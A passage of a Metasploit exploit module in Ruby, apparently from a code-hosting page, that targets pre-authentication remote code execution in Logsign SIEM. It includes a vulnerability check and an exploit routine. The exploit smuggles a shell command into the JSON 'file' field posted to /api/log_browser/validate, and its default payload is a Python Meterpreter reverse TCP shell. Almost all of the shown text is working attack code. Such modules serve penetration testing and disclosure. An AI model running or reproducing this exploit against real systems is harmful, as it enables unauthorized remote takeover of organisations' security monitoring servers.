This module was tested against 4.4.2 and 4.4.137 versions.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DisclosureDate' => 'Feb 26 2017',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
p_hash = {:file => "#{rand_text_alpha(15 + rand(4))}.raw"}
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
|
||||
'ctype' => 'application/json',
|
||||
'data' => JSON.generate(p_hash)
|
||||
)
|
||||
|
||||
if res && res.body.include?('{"message": "success", "success": true}')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Delivering payload...")
|
||||
|
||||
p_hash = {:file => "logsign.raw\" quit 2>&1 |python -c \"#{payload.encoded}\" #"}
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api', 'log_browser', 'validate'),
|
||||
'ctype' => 'application/json',
|
||||
'data' => JSON.generate(p_hash)
|
||||
)
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue